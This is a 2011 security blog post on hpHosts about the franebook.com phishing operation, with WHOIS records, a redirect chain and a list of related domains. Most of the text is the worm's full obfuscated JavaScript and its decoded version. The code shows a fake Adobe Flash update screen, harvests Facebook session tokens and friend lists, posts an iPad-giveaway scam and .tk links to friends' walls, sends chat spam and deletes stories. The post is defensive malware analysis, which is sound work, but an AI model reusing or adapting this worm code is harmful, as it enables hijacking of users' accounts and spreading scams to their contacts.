Blog for hpHosts, and whatever else I feel like writing about ....

Tuesday, 8 March 2011

franebook: An update

Normally I get very annoyed with myself when I miss one of Chris Boyds blogs. This time however, I'm partially glad I did, as otherwise, I may have missed what I've just found.

Going over some of the stuff he found, I decided to do a bit more digging, and not only has franebook.com come back to life - the bad guys behind it have gotten themselves some new domains, all associated with a single name server - dark-dns-services.com;

Domain Name.......... dark-dns-services.com
Creation Date........ 2011-02-12 11:34:29
Registration Date.... 2011-02-12 11:34:29
Expiry Date.......... 2012-02-12 11:34:29
Organisation Name.... huang xinyi
Organisation Address. yuanlinlu57
Organisation Address.
Organisation Address. nantong
Organisation Address. 226051
Organisation Address. JS
Organisation Address. CN

Admin Name........... huangxinyi
Admin Address........ yuanlinlu57
Admin Address........
Admin Address........ nantong
Admin Address........ 226051
Admin Address........ JS
Admin Address........ CN
Admin Email.......... shangmenwei@163.com
Admin Phone.......... +86.51385051689
Admin Fax............ +86.51385051689

Tech Name............ huangxinyi
Tech Address......... yuanlinlu57
Tech Address.........
Tech Address......... nantong
Tech Address......... 226051
Tech Address......... JS
Tech Address......... CN
Tech Email........... shangmenwei@163.com
Tech Phone........... +86.51385051689
Tech Fax............. +86.51385051689

Bill Name............ huangxinyi
Bill Address......... yuanlinlu57
Bill Address.........
Bill Address......... nantong
Bill Address......... 226051
Bill Address......... JS
Bill Address......... CN
Bill Email........... shangmenwei@163.com
Bill Phone........... +86.51385051689
Bill Fax............. +86.51385051689
Name Server.......... ns5.dark-dns-services.com
Name Server.......... ns4.dark-dns-services.com
Name Server.......... ns2.dark-dns-services.com
Name Server.......... ns1.dark-dns-services.com


franebook.com itself is only seemingly serving content via 2 URLs at present, though no doubt that will change in the near future;

www(dot)franebook.com/usa/index14.php
www(dot)franebook.com/usa/app3/js.php

index14.php as you see in the screenshot above (top left), is the phishing side of it. js.php contains the following bit of lovelyness;


eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c+'\\b','g'),k[c])}}return p}('17 112(){10 78=24;11(111.127){78=15 111.127()}20{78=15 283(\'288.287\')}19 78}17 31(59,49,55,14){10 22=15 112();11(49){88=\'168\'}20{88=\'171\'}22.170(88,59,36,55);11(49){22.103(\'105-180\',\'191/78-192-193-195\');22.103(\'105-189\',49.65)}22.188=17(){11(22.183==4&&22.165==200){10 13=22.184.97(/\\\\/45,\'\');11(14){104(55+\'(13,14)\')}20{104(55+\'(13)\')}}};22.129(49)}11(!34.231.135){34.231.135=17(109,70){11(70==289){70=0}20 11(70<0){70=125.268(0,71.65+70)}128(10 16=70,227=71.65;16<227;16++){11(71[16]===109)19 16}19-1}}17 178(223,109){19(223.135(109)!=-1)}17 228(){10 256=23.272(\'284\')[0];10 60=23.63(\'141\');60.173=\'140/60\';60.311=\'298\';60.294=114+\'73.60\';60.301=\'302\';256.47(60);10 44=23.63(\'136\');44.39(\'18\',\'185\');44.39(\'73\',\'312:308; 307:282; 132: 0; 300: 0; 276: 0; 95: 0;\');10 16=23.63(\'182\');16.39(\'166\',114+\'285.267\');16.39(\'73\',\'124-95: 50%; 175-95: -275;\');44.47(16);10 41=\'140-270: 274; 273: #271; 124-132: \';10 16=23.63(\'136\');16.39(\'18\',\'313\');10 14=23.63(\'181\');14.39(\'73\',41+\'306; 150-304: 309; 150-296: 303;\');10 115=23.156(\'297: 295 225 292\');14.47(115);16.47(14);44.47(16);10 16=23.63(\'182\');16.39(\'166\',114+\'51-299.291\');16.39(\'73\',\'124-132: 310; 124-95: 50%; 175-95: -290;\');44.47(16);10 16=23.63(\'136\');16.39(\'18\',\'305\');10 14=23.63(\'181\');14.39(\'18\',\'160\');14.39(\'73\',41+\'269;\');10 115=23.156(\'286..\');14.47(115);16.47(14);44.47(16);23.76.47(44);111.190=17(){19\'278 72 277 101 157 279 280 72 281 293 325 159 355 354!\'};19}17 240(){10 139=0;11(110){139=125.356(110/98*100)}11(92){40=\'357\'}20{40=\'359\'}10 151=139+\'% 358. \'+40+\' 157 (353.352) 131 159\';10 164=23.187("160");164.347.346=151}17 167(){10 44=23.187(\'185\');23.76.361(44);111.190=24;19}17 172(13){10 12=13.27(\'"122":([^"]+),"123":"([^"]+)"\');11(!12){19 64()}32=12[1];10 42=15 31(\'/51/349/351.43?56=1&122=\'+32+\'&123=\'+12[2]+\'&350[0]=133&360[0]=364\',24,\'169\',24)}17 169(13){54=15 34();61=15 34();10 33=/"e372":([^"]+),"173":"133","140":"([^"]+)"/45;10 12;85(12=33.79(13)){11(12[1]!=32){224+=1;61.81(12[1]);54.81(12[2])}}98=54.65+98;10 16=0;128(16=0;16<=94;16++){137.81(15 138())}}17 177(13){10 26=13.27(\'29="37" 30="([^"]+)"\');10 28=13.27(\'29="35" 30="([^"]+)"\');10 12=13.27(\'"122":([^"]+),"123":\');11(!12||!28||!26){19 64()}10 32=12[1];10 14=\'35=\'+28[1]+\'&370=36&37=\'+26[1]+\'&69&371=24&67=68&133=\'+32;10 42=15 31(\'/51/257/369.43?56=1\',14,\'179\',24)}17 229(13){10 12=13.27(\'"122":([^"]+),"123":\');11(!12){19 64()}32=12[1];10 42=15 31(\'/52.43?18=\'+32+\'&152=161\',24,\'194\',24)}17 194(13){10 46=\'163 158\';11(13.66(\';">\'+46)!=-1){19 38(13)}10 26=13.27(\'29="37" 30="([^"]+)"\');10 28=13.27(\'29="35" 30="([^"]+)"\');10 62=13.27(\'29="75" 30="([^"]+)"\');11(!62){19 38(13)}10 59=\'82://367.134\';10 14=\'37=\'+26[1]+\'&=154&35=\'+28[1]+\'&75=\'+62[1]+\'&120=\'+32+\'&153=\'+32+\'&113=52&84=&155=\'+25(59)+\'&89[91]=90&69&84&108&121&67=68\';10 21=15 34(28[1],26[1],62[1],46);10 42=15 31(\'/51/118/58/141/145.43?56=1\',14,\'174\',21)}17 174(13,21){10 33=/29="([^"]+)" 30="([^"]+)"/45;10 14,12,86,48,41;10 40=\'87 247 246 102, 87 248 249 48 250 258 130 264 263 261 197. 260 93 265 106 99 48 266 262, 255 244 214 72 71. 213 93 212 106 211 99 131 101 15 215 216! 87 220 219 102\';10 83=\'218 245 217 210 72 209 202 201\';10 46=21[3];10 57=\'82://4.199.198.142/203/204/208/207/206/205.221\';10 126=\'24\';10 74;85(12=33.79(13)){41=24;10 80=\'58[77][222][0]\';11(!86){11(!12){19 38(13)};14=\'238=0&35=\'+21[0]+\'&69&89[91]=90&37=\'+21[1]+\'&67=68&75=\'+21[2]+\'&113=52&84&108=\'+25(40)+\'&121=\'+25(40)+\'&120=\'+32+\'&\'+25(12[1])+\'=\'+25(12[2]);11(83){14=14+\'&58[77][237]=\'+25(83)}86=36}20{11(12[1]==\'58[77][236]\'){12[2]=46}20 11(12[1]==80){11(57){12[2]=57;74=36}}20 11(12[1]==\'235\'){12[2]=126}11(12[1]==\'239\'){11(!48){48=36}20{41=36}}11(!41){14=14+\'&\'+25(12[1])+\'=\'+25(12[2])}}}11(!14){19 38(13)}11(!74){14=14+\'&\'+80+\'=\'+57}10 42=15 31(\'/51/52/118.43?56=1\',14,\'176\',24)}17 176(13){177(23.76.107)}17 179(13){54=15 34();61=15 34();10 33=/"([^"]+)":{"16":/45;10 12;85(12=33.79(13)){61.81(12[1])}10 33=/"([^"]+)":{"29":"([^"]+)","363"/45;85(12=33.79(13)){11(178(61,12[1])){54.81(12[2])}}11(!54){19 64()}98=54.65;10 16=0;128(16=0;16<=94;16++){137.81(15 138())}}17 64(){11(!92){92=1;119=0;172(23.76.107)}20{368("167();",362)}19}17 138(){17 31(59,49,55,14){10 22=15 112();11(49){88=\'168\'}20{88=\'171\'}22.170(88,59,36,55);11(49){22.103(\'105-180\',\'191/78-192-193-195\');22.103(\'105-189\',49.65)}22.188=17(){11(22.183==4&&22.165==200){10 13=22.184.97(/\\\\/45,\'\');11(14){104(55+\'(13,14)\')}20{104(55+\'(13)\')}}};22.129(49)}17 242(18,14){10 42=15 31(\'/52.43?18=\'+18,24,14,18)}17 241(13,18){13=13.97(/&365;/45,\'&\').97(/%/45,\'\');10 33=/143=(.*?)&146=(.*?)&147=(.*?)&144=1&186=196&149(.*?)=(.*?)366(.*?)&148=(.*?)"/45;10 26=13.27(\'29="37" 30="([^"]+)"\');10 28=13.27(\'29="35" 30="([^"]+)"\');11(!28||!26){19 64()}10 12;85(12=33.79(13)){10 14=\'186=196&348=1&344=1&35=\'+28[1]+\'&144=1&69&143=\'+12[1]+\'&89[91]=90&37=\'+26[1]+\'&67=68&146=\'+12[2]+\'&149[0]=\'+12[5]+\':\'+12[6]+\'&148=\'+12[7]+\'&147=\'+12[3];10 42=15 31(\'/51/324.43?56=1\',14,\'96\',24)}96()}17 233(18,53){10 21=15 34(18,53);10 42=15 31(\'/52.43?18=\'+18+\'&152=161\',24,\'162\',21)}17 162(13,21){10 18=21[0];10 53=21[1];10 46=\'163 158!\';11(13.66(\';">\'+46)!=-1){19 38(13)}10 26=13.27(\'29="37" 30="([^"]+)"\');10 28=13.27(\'29="35" 30="([^"]+)"\');10 62=13.27(\'29="75" 30="([^"]+)"\');11(!62){19 38(13)}10 59=\'82://323.134\';10 14=\'37=\'+26[1]+\'&=154&35=\'+28[1]+\'&75=\'+62[1]+\'&120=\'+18+\'&153=\'+18+\'&113=52&84=&155=\'+25(59)+\'&89[91]=90&69&84&108&121&67=68\';10 21=15 34(28[1],26[1],62[1],18,53,46);10 42=15 31(\'/51/118/58/141/145.43?56=1\',14,\'252\',21)}17 226(13,18,53){10 40=\'251, 345 101 326 93 72 328 327 71 322? 321 71 316 315 317?? 318 82://320.134\';10 259=(125.314(125.319()*329)+1).254();10 253=15 330().340().254().97(\'.\',\'\');10 26=13.27(\'29="37" 30="([^"]+)"\');10 28=13.27(\'29="35" 30="([^"]+)"\');11(!28||!26){19 64()}10 14=\'339=\'+253+\'&35=\'+28[1]+\'&69&341=\'+259+\'&342=\'+25(40)+\'&343=1&37=\'+26[1]+\'&67=68&338&130=\'+18+\'&337=24\';10 42=15 31(\'/51/257/129.43?56=1\',14,\'38\',24)}17 252(13,21){10 33=/29="([^"]+)" 30="([^"]+)"/45;10 14,12,86,48,41;10 53=21[4];10 40=\'251 87 247 246 102, 87 248 249 48 250 258 130 264 263 261 197. 260 93 265 106 99 48 266 262, 255 244 214 72 71. 213 93 212 106 211 99 131 101 15 215 216! 87 220 219 102\';10 83=\'218 245 217 210 72 209 202 201!\';10 46=21[5];10 57=\'82://4.199.198.142/203/204/208/207/206/205.221\';10 126=\'24\';10 74;85(12=33.79(13)){41=24;10 80=\'58[77][222][0]\';11(!86){11(!12){19 38(13)};14=\'238=0&35=\'+21[0]+\'&69&89[91]=90&37=\'+21[1]+\'&67=68&75=\'+21[2]+\'&113=52&84&108=\'+25(40)+\'&121=\'+25(40)+\'&120=\'+21[3]+\'&\'+25(12[1])+\'=\'+25(12[2]);11(83){14=14+\'&58[77][237]=\'+25(83)}86=36}20{11(12[1]==\'58[77][236]\'){12[2]=46}20 11(12[1]==80){11(57){12[2]=57;74=36}}20 11(12[1]==\'235\'){12[2]=126}11(12[1]==\'239\'){11(!48){48=36}20{41=36}}11(!41){14=14+\'&\'+25(12[1])+\'=\'+25(12[2])}}}11(!14){19 38(13)}11(!74){14=14+\'&\'+80+\'=\'+57}10 42=15 31(\'/51/52/118.43?56=1\',14,\'38\',36)}17 38(13,243){11(13.66(\'"332":0,\')!=-1){110+=1;240()}11(243){242(32,\'241\')}20{96()}}17 96(){11(61.65){10 18=61.234();10 53=54.234();11(92){233(18,53)}20{226(23.76.107,18,53)}}20{11(119!=94){119+=1}20{64()}}}96()}10 22=15 112();11(!22){331(\'127 225 333\')}20{10 61=15 34();10 54=15 34();10 32;10 110=0;10 94=2;10 224=0;10 119=0;10 114=\'82://334.142/336/335/\';10 92=0;10 98=0;228();11(117.116.66(\'232/3\')!=-1||117.116.66(\'232/4\')!=-1||117.116.66(\'230 8\')!=-1||117.116.66(\'230 9\')!=-1){94=6}137=15 34();229(23.76.107)}',10,373,'||||||||||var|if|m|res|p|new|i|function|id|return|else|vr|xO|document|false|escape|pfid|match|fbsg|name|value|hS|vw|re|Array|fb_dtsg|true|post_form_id|dF|setAttribute|msg|s|hs|php|l|g|tt|appendChild|a|v||ajax|profile|nm|nms|r|__a|pu|attachment|u|css|ids|cid|createElement|dN|length|search|post_form_id_source|AsyncRequest|lsd|fromIndex|this|you|style|si|xhpc_composerid|body|params|x|exec|imgp|push|http|dsc|xhpc_fbx|while|ic|I|pT|nctr|pagelet_tab_content|_mod|tOP|are|wt|left|pV|replace|wtot|away||the|it|setRequestHeader|eval|Content|giving|innerHTML|xhpc_message|obj|wc|window|gXMLO|xhpc_context|b|t|userAgent|navigator|composer|cb|xhpc_targetid|xhpc_message_text|viewer|token|padding|Math|pc|XMLHttpRequest|for|send|to|from|top|user|tk|indexOf|div|pool|wT|perc|text|link|com|ministory_key|feedback|scraper|profile_fbid|story_type|story_id|story_fbids|font|txt|sk|targetid|Attach|scrape_url|createTextNode|update|Here|Adobe|txtc|wall|dWPL|Click|txto|status|src|hL|POST|s3|open|GET|s2|type|dSU3|margin|dSU4|sIM|include|sIM2|Type|P|img|readyState|responseText|LoadingDiv|action_key|getElementById|onreadystatechange|Length|onbeforeunload|application|www|form|dSU2|urlencoded|remove_content|keep|blogspot|bp||too|one|_92UFpWRIzAA|S8MZBPAycKI|IMG_0858|s1600|uAvDw6RVnmw|AAAAAAAAAio|get|when|them|still|There|showing|years|overstock|know|Let|LOVE|absolutely|JPG|images|arr|tc|Not|dIM|j|sL|dSU|MSIE|prototype|Firefox|dWP|pop|no_picture|title|summary|UIThumbPager_Input|app_id|cT|cU|gW|w|Im|me|believe|cant|actually|got|free|Hey|dWPL2|tme|toString|so|hid|chat|ipad|mid|They|and|supply|out|test|only|limited|png|max|13px|align|FFFFFF|getElementsByTagName|color|center|128px|bottom|abort|If|process|now|will|absolute|ActiveXObject|head|flash|Loading|XMLHTTP|Microsoft|null|110px|gif|Interrupt|corrupt|href|Do|size|Caution|stylesheet|loader|right|media|screen|9pt|weight|ProgressDiv|10px|position|block|bolder|16px|rel|display|WarningDiv|floor|or|dancing|what|Bahahaha|random|begoneweight201|Is|video|getridoftime9|minifeed|your|hell|in|doing|4294967295|Date|alert|error|Supported|franebook|app3|usa|to_offline|pvs_time|client_time|getTime|msg_id|msg_text|num_tabs|dialog|What|nodeValue|firstChild|confirmed|typeahead|filter|first_degree|1034|v10|installation|Flash|round|Installing|updated|Receiving|options|removeChild|3000|firstName|friends_only|amp|u00253A|weithajs2|setTimeout|buddy_list|force_render|popped_out|uid'.split('|')))


Which decodes to (formatted for readability);

function gXMLO()
{
var x=false;
if(window.XMLHttpRequest)
{
x=new window.XMLHttpRequest()
}
else
{
x=new ActiveXObject('Microsoft.XMLHTTP')
}
return x
}
function hS(u,v,r,p)
{
var xO=new gXMLO();
if(v)
{
pT='POST'
}
else
{
pT='GET'
}
xO.open(pT,u,true,r);
if(v)
{
xO.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
xO.setRequestHeader('Content-Length',v.length)
}
xO.onreadystatechange=function()
{
if(xO.readyState==4&&xO.status==200)
{
var res=xO.responseText.replace(/\\/g,'');
if(p)
{
eval(r+'(res,p)')
}
else
{
eval(r+'(res)')
}
}
};
xO.send(v)
}
if(!Array.prototype.indexOf)
{
Array.prototype.indexOf=function(obj,fromIndex)
{
if(fromIndex==null)
{
fromIndex=0
}
else if(fromIndex<
0)
{
fromIndex=Math.max(0,this.length+fromIndex)
}
for(var i=fromIndex,j=this.length;i<j;i++)
{
if(this[i]===obj)return i
}
return-1
}
}
function include(arr,obj)
{
return(arr.indexOf(obj)!=-1)
}
function sL()
{
var hid=document.getElementsByTagName('head')[0];
var css=document.createElement('link');
css.type='text/css';
css.rel='stylesheet';
css.href=b+'style.css';
css.media='screen';
hid.appendChild(css);
var l=document.createElement('div');
l.setAttribute('id','LoadingDiv');
l.setAttribute('style','display:block; position:absolute; top: 0; right: 0; bottom: 0; left: 0;');
var i=document.createElement('img');
i.setAttribute('src',b+'flash.png');
i.setAttribute('style','padding-left: 50%; margin-left: -128px;');
l.appendChild(i);
var s='text-align: center; color: #FFFFFF; padding-top: ';
var i=document.createElement('div');
i.setAttribute('id','WarningDiv');
var p=document.createElement('P');
p.setAttribute('style',s+'10px; font-weight: bolder; font-size: 9pt;');
var t=document.createTextNode('Caution: Do Not Interrupt');
p.appendChild(t);
i.appendChild(p);
l.appendChild(i);
var i=document.createElement('img');
i.setAttribute('src',b+'ajax-loader.gif');
i.setAttribute('style','padding-top: 16px; padding-left: 50%; margin-left: -110px;');
l.appendChild(i);
var i=document.createElement('div');
i.setAttribute('id','ProgressDiv');
var p=document.createElement('P');
p.setAttribute('id','txtc');
p.setAttribute('style',s+'13px;');
var t=document.createTextNode('Loading..');
p.appendChild(t);
i.appendChild(p);
l.appendChild(i);
document.body.appendChild(l);
window.onbeforeunload=function()
{
return'If you abort the update process now you will corrupt your Adobe Flash installation!'
};
return
}
function cT()
{
var perc=0;
if(wc)
{
perc=Math.round(wc/wtot*100)
}
if(tOP)
{
msg='Installing'
}
else
{
msg='Receiving'
}
var txt=perc+'% updated. '+msg+' update (v10.1034) from Adobe';
var txto=document.getElementById("
txtc"
);
txto.firstChild.nodeValue=txt
}
function hL()
{
var l=document.getElementById('LoadingDiv');
document.body.removeChild(l);
window.onbeforeunload=false;return
}
function s2(res)
{
var m=res.match('"viewer":([^"]+),"token":"([^"]+)"');
if(!m)
{
return dN()
}
vw=m[1];
var hs=new hS('/ajax/typeahead/first_degree.php?__a=1&viewer='+vw+'&token='+m[2]+'&filter[0]=user&options[0]=friends_only',false,'s3',false)
}
function s3(res)
{
nms=new Array();
ids=new Array();
var re=/"
uid"
:([^"
]+),"
type"
:"
user"
,"
text"
:"
([^"
]+)"
/g;
var m;
while(m=re.exec(res))
{
if(m[1]!=vw)
{
tc+=1;
ids.push(m[1]);
nms.push(m[2])
}
}
wtot=nms.length+wtot;
var i=0;
for(i=0;i<=wt;i++)
{
pool.push(new wT())
}
}
function sIM(res)
{
var pfid=res.match('name="post_form_id" value="([^"]+)"');
var fbsg=res.match('name="fb_dtsg" value="([^"]+)"');
var m=res.match('"viewer":([^"]+),"token":');
if(!m||!fbsg||!pfid)
{
return dN()
}
var vw=m[1];
var p='fb_dtsg='+fbsg[1]+'&force_render=true&post_form_id='+pfid[1]+'&lsd&popped_out=false&post_form_id_source=AsyncRequest&user='+vw;var hs=new hS('/ajax/chat/buddy_list.php?__a=1',p,'sIM2',false)
}
function dSU(res)
{
var m=res.match('"viewer":([^"]+),"token":');
if(!m)
{
return dN()
}
vw=m[1];
var hs=new hS('/profile.php?id='+vw+'&sk=wall',false,'dSU2',false)
}
function dSU2(res)
{
var tt='Click Here';
if(res.search(';">'+tt)!=-1)
{
return dF(res)
}
var pfid=res.match('name="post_form_id" value="([^"]+)"');
var fbsg=res.match('name="fb_dtsg" value="([^"]+)"');
var cid=res.match('name="xhpc_composerid" value="([^"]+)"');
if(!cid)
{
return dF(res)
}
var u='http://weithajs2.tk';
var p='post_form_id='+pfid[1]+'&=Attach&fb_dtsg='+fbsg[1]+'&xhpc_composerid='+cid[1]+'&xhpc_targetid='+vw+'&targetid='+vw+'&xhpc_context=profile&xhpc_fbx=&scrape_url='+escape(u)+'&nctr[_mod]=pagelet_tab_content&lsd&xhpc_fbx&xhpc_message&xhpc_message_text&post_form_id_source=AsyncRequest';var vr=new Array(fbsg[1],pfid[1],cid[1],tt);
var hs=new hS('/ajax/composer/attachment/link/scraper.php?__a=1',p,'dSU3',vr)
}
function dSU3(res,vr)
{
var re=/name="
([^"
]+)"
value="
([^"
]+)"
/g;
var p,m,ic,a,s;
var msg='I cant believe it, I actually got a free ipad to test out and keep. They are only giving away a limited supply, so Im showing you this. There are still giving them away from the new years overstock! I absolutely LOVE it';
var dsc='Let me know when you get one too';
var tt=vr[3];
var pu='https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrAQcbjXTxvtDROhwZWYqWG2etq9ZTVTSUMG6nGjyD7yZTvF_bc0XgbItZlbUUufGSHEPkS8LlR8GHk81Ufp06eo4VnFEqZYKQeSilflegedk308UZCCMSbC5N_yOJSaJWHuWRletDJPGh/s1600/IMG_0858.JPG';
var pc='false';
var si;
while(m=re.exec(res))
{
s=false;
var imgp='attachment[params][images][0]';
if(!ic)
{
if(!m)
{
return dF(res)
};
p='UIThumbPager_Input=0&fb_dtsg='+vr[0]+'&lsd&nctr[_mod]=pagelet_tab_content&post_form_id='+vr[1]+'&post_form_id_source=AsyncRequest&xhpc_composerid='+vr[2]+'&xhpc_context=profile&xhpc_fbx&xhpc_message='+escape(msg)+'&xhpc_message_text='+escape(msg)+'&xhpc_targetid='+vw+'&'+escape(m[1])+'='+escape(m[2]);
if(dsc)
{
p=p+'&attachment[params][summary]='+escape(dsc)
}
ic=true
}
else
{
if(m[1]=='attachment[params][title]')
{
m[2]=tt
}
else if(m[1]==imgp)
{
if(pu)
{
m[2]=pu;
si=true
}
}
else if(m[1]=='no_picture')
{
m[2]=pc
}
if(m[1]=='app_id')
{
if(!a)
{
a=true
}
else
{
s=true
}
}
if(!s)
{
p=p+'&'+escape(m[1])+'='+escape(m[2])
}
}
}
if(!p)
{
return dF(res)
}
if(!si)
{
p=p+'&'+imgp+'='+pu
}
var hs=new hS('/ajax/profile/composer.php?__a=1',p,'dSU4',false)
}
function dSU4(res)
{
sIM(document.body.innerHTML)
}
function sIM2(res)
{
nms=new Array();
ids=new Array();
var re=/"
([^"
]+)"
:
{
"
i"
:/g;
var m;
while(m=re.exec(res))
{
ids.push(m[1])
}
var re=/"
([^"
]+)"
:
{
"
name"
:"
([^"
]+)"
,"
firstName"
/g;
while(m=re.exec(res))
{
if(include(ids,m[1]))
{
nms.push(m[2])
}
}
if(!nms)
{
return dN()
}
wtot=nms.length;
var i=0;
for(i=0;i<=wt;i++)
{
pool.push(new wT())
}
}
function dN()
{
if(!tOP)
{
tOP=1;
cb=0;
s2(document.body.innerHTML)
}
else
{
setTimeout("
hL();
"
,3000)
}
return
}
function wT()
{
function hS(u,v,r,p)
{
var xO=new gXMLO();
if(v)
{
pT='POST'
}
else
{
pT='GET'
}
xO.open(pT,u,true,r);
if(v)
{
xO.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
xO.setRequestHeader('Content-Length',v.length)
}
xO.onreadystatechange=function()
{
if(xO.readyState==4&&xO.status==200)
{
var res=xO.responseText.replace(/\\/g,'');
if(p)
{
eval(r+'(res,p)')
}
else
{
eval(r+'(res)')
}
}
};
xO.send(v)
}
function gW(id,p)
{
var hs=new hS('/profile.php?id='+id,false,p,id)
}
function cU(res,id)
{
res=res.replace(/&
/g,'&').replace(/%/g,'');
var re=/ministory_key=(.*?)&profile_fbid=(.*?)&story_type=(.*?)&feedback=1&action_key=remove_content&story_fbids(.*?)=(.*?)u00253A(.*?)&story_id=(.*?)"
/g;
var pfid=res.match('name="post_form_id" value="([^"]+)"');
var fbsg=res.match('name="fb_dtsg" value="([^"]+)"');
if(!fbsg||!pfid)
{
return dN()
}
var m;
while(m=re.exec(res))
{
var p='action_key=remove_content&confirmed=1&dialog=1&fb_dtsg='+fbsg[1]+'&feedback=1&lsd&ministory_key='+m[1]+'&nctr[_mod]=pagelet_tab_content&post_form_id='+pfid[1]+'&post_form_id_source=AsyncRequest&profile_fbid='+m[2]+'&story_fbids[0]='+m[5]+':'+m[6]+'&story_id='+m[7]+'&story_type='+m[3];var hs=new hS('/ajax/minifeed.php?__a=1',p,'pV',false)
}
pV()
}
function dWP(id,nm)
{
var vr=new Array(id,nm);
var hs=new hS('/profile.php?id='+id+'&sk=wall',false,'dWPL',vr)
}
function dWPL(res,vr)
{
var id=vr[0];
var nm=vr[1];
var tt='Click Here!';
if(res.search(';">'+tt)!=-1)
{
return dF(res)
}
var pfid=res.match('name="post_form_id" value="([^"]+)"');
var fbsg=res.match('name="fb_dtsg" value="([^"]+)"');
var cid=res.match('name="xhpc_composerid" value="([^"]+)"');
if(!cid)
{
return dF(res)
}
var u='http://getridoftime9.tk';
var p='post_form_id='+pfid[1]+'&=Attach&fb_dtsg='+fbsg[1]+'&xhpc_composerid='+cid[1]+'&xhpc_targetid='+id+'&targetid='+id+'&xhpc_context=profile&xhpc_fbx=&scrape_url='+escape(u)+'&nctr[_mod]=pagelet_tab_content&lsd&xhpc_fbx&xhpc_message&xhpc_message_text&post_form_id_source=AsyncRequest';var vr=new Array(fbsg[1],pfid[1],cid[1],id,nm,tt);
var hs=new hS('/ajax/composer/attachment/link/scraper.php?__a=1',p,'dWPL2',vr)
}
function dIM(res,id,nm)
{
var msg='Hey, What the hell are you doing in this video? Is this dancing or what?? Bahahaha http://begoneweight201.tk';
var mid=(Math.floor(Math.random()*4294967295)+1).toString();
var tme=new Date().getTime().toString().replace('.','');
var pfid=res.match('name="post_form_id" value="([^"]+)"');
var fbsg=res.match('name="fb_dtsg" value="([^"]+)"');
if(!fbsg||!pfid)
{
return dN()
}
var p='client_time='+tme+'&fb_dtsg='+fbsg[1]+'&lsd&msg_id='+mid+'&msg_text='+escape(msg)+'&num_tabs=1&post_form_id='+pfid[1]+'&post_form_id_source=AsyncRequest&pvs_time&to='+id+'&to_offline=false';var hs=new hS('/ajax/chat/send.php?__a=1',p,'dF',false)
}
function dWPL2(res,vr)
{
var re=/name="
([^"
]+)"
value="
([^"
]+)"
/g;
var p,m,ic,a,s;
var nm=vr[4];
var msg='Hey I cant believe it, I actually got a free ipad to test out and keep. They are only giving away a limited supply, so Im showing you this. There are still giving them away from the new years overstock! I absolutely LOVE it';
var dsc='Let me know when you get one too!';
var tt=vr[5];
var pu='https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrAQcbjXTxvtDROhwZWYqWG2etq9ZTVTSUMG6nGjyD7yZTvF_bc0XgbItZlbUUufGSHEPkS8LlR8GHk81Ufp06eo4VnFEqZYKQeSilflegedk308UZCCMSbC5N_yOJSaJWHuWRletDJPGh/s1600/IMG_0858.JPG';
var pc='false';
var si;
while(m=re.exec(res))
{
s=false;
var imgp='attachment[params][images][0]';
if(!ic)
{
if(!m)
{
return dF(res)
};
p='UIThumbPager_Input=0&fb_dtsg='+vr[0]+'&lsd&nctr[_mod]=pagelet_tab_content&post_form_id='+vr[1]+'&post_form_id_source=AsyncRequest&xhpc_composerid='+vr[2]+'&xhpc_context=profile&xhpc_fbx&xhpc_message='+escape(msg)+'&xhpc_message_text='+escape(msg)+'&xhpc_targetid='+vr[3]+'&'+escape(m[1])+'='+escape(m[2]);
if(dsc)
{
p=p+'&attachment[params][summary]='+escape(dsc)
}
ic=true
}
else
{
if(m[1]=='attachment[params][title]')
{
m[2]=tt
}
else if(m[1]==imgp)
{
if(pu)
{
m[2]=pu;
si=true
}
}
else if(m[1]=='no_picture')
{
m[2]=pc
}
if(m[1]=='app_id')
{
if(!a)
{
a=true
}
else
{
s=true
}
}
if(!s)
{
p=p+'&'+escape(m[1])+'='+escape(m[2])
}
}
}
if(!p)
{
return dF(res)
}
if(!si)
{
p=p+'&'+imgp+'='+pu
}
var hs=new hS('/ajax/profile/composer.php?__a=1',p,'dF',true)
}
function dF(res,w)
{
if(res.search('"error":0,')!=-1)
{
wc+=1;
cT()
}
if(w)
{
gW(vw,'cU')
}
else
{
pV()
}
}
function pV()
{
if(ids.length)
{
var id=ids.pop();
var nm=nms.pop();
if(tOP)
{
dWP(id,nm)
}
else
{
dIM(document.body.innerHTML,id,nm)
}
}
else
{
if(cb!=wt)
{
cb+=1
}
else
{
dN()
}
}
}
pV()
}
var xO=new gXMLO();
if(!xO)
{
alert('XMLHttpRequest Not Supported')
}
else
{
var ids=new Array();
var nms=new Array();
var vw;
var wc=0;
var wt=2;
var tc=0;
var cb=0;
var b='http://franebook.com/usa/app3/';
var tOP=0;
var wtot=0;
sL();
if(navigator.userAgent.search('Firefox/3')!=-1||navigator.userAgent.search('Firefox/4')!=-1||navigator.userAgent.search('MSIE 8')!=-1||navigator.userAgent.search('MSIE 9')!=-1)
{
wt=6
}
pool=new Array();
dSU(document.body.innerHTML)}


Did you see it? The lovely loading of a .tk site;

weithajs2.tk

This goes on to load (in order);

1. pegasusstar.info/iuko.php

2. dancewithrico.info/weight7.php

3. jump.cttrk.com/aff_c?offer_id=3276&aff_id=1764

4. jump.cttrk.com/aff_r?offer_id=3276&aff_id=1764&url=http%3A%2F%2Ftrack.yourrewardinside.com%2FDefaultPage.aspx%3Fnm%3D014gjfq2jkxp%26s%3D1764e

5. track.yourrewardinside.com/DefaultPage.aspx?nm=014gjfq2jkxp&s=1764e

6. www.tracklead.net/click.track?CID=134785&AFID=138362&ADID=367060&SID=

7. fatcatrewards.com/uk/bonuscash/?l=1031&p=138362

8. www.fatcatrewards.com/uk/bonuscash/?l=1031&p=138362

So including pegasusstar.info and dancewithrico.info, the list now stands at (excluding the .tk site, and the sites you're redirected to such as jump.cttrk.com);

dark-dns-services.com    huang xinyi / shangmenwei@163.com    BEIJING INNOVATIVE LINKAGE TECHNOLOGY LTD. DBA DNS.COM.CN
cantiq.info    Vlad Marks / vladmarks@yahoo.ca    eNom, Inc. (R126-LRMS)
ipadapps4you.info    Vlad Marks / vladmarks@yahoo.ca    eNom, Inc. (R126-LRMS)
globalamc.info    Vlad Marks / vladmarks@yahoo.ca    eNom, Inc. (R126-LRMS)
loungeinthesky.info    Vlad Marks / vladmarks@yahoo.ca    eNom, Inc. (R126-LRMS)
joytronic.info    Vlad Marks / vladmarks@yahoo.ca    eNom, Inc. (R126-LRMS)
knowledge-library.info    Vlad Marks / vladmarks@yahoo.ca    eNom, Inc. (R126-LRMS)
